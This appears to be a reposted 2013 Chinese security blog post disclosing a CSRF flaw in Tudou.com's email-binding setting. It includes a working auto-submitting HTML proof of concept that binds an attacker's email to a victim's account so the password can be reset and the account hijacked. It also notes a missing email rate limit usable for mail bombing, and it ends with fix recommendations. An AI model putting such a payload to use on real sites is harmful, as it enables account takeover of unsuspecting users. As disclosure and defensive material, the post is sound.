记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

土豆网邮箱绑定csrf(可导致劫持账号)

2013-08-29 14:25

这是问题页面~



顺带一个比较糟糕的问题,这里没有设置邮件发送间隔的时间哦,相当于发动技能无cd。


看吧刷屏了,可以做炸弹神马的哦。

言归正传,先抓个包



木有token哦客官。

poc

 


<html>
<body>
<form id="tudou" name="tudou" action="http://www.tudou.com/my/setting/private.action" method="POST">
<input type="hidden" name="email" value="***@163.com" />
<input type="submit" value="submit" />
</form>
<script>
document.tudou.submit();
</script>
</body>
</html>


提交后返回一个已发送的页面,其实可以构造的更隐蔽,未进一步深入。

然后就上传页面到服务器,诱惑用户访问,pia一声就会有验证邮件了哦。

更糟糕的是绑定后就可以重置密码了,然后就是劫持账户,然后……
 





修复方案

加token,增加发邮件的间隔时间,还有土豆的crossdomain.xml设置不当,给跨域提供了可能性,你家优酷的就设置的挺好的

知识来源: www.2cto.com/Article/201308/239719.html

阅读:85020 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“土豆网邮箱绑定csrf(可导致劫持账号)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云